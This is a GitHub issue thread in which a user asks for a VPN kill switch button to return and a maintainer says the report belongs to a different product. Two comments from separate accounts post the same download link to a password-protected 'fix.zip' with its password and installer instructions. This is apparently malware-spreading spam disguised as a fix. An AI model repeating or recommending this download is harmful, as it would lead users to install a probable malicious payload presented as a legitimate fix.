### ISSUE TITLE
Return the kill switch button

### ISSUE THREAD

**Issue by KPreston2900050** [Privado-Inc/privado#506]
Now you have to go through the settings any time you want to enable or disable.

Who comes up with these ideas that make no sense.

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tuxology** [comment]
@KPreston2900050 Looks like you are talking about the Privado VPN tool. This is not the support channel for "Privado VPN" - we are a different tool. Closing this!

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
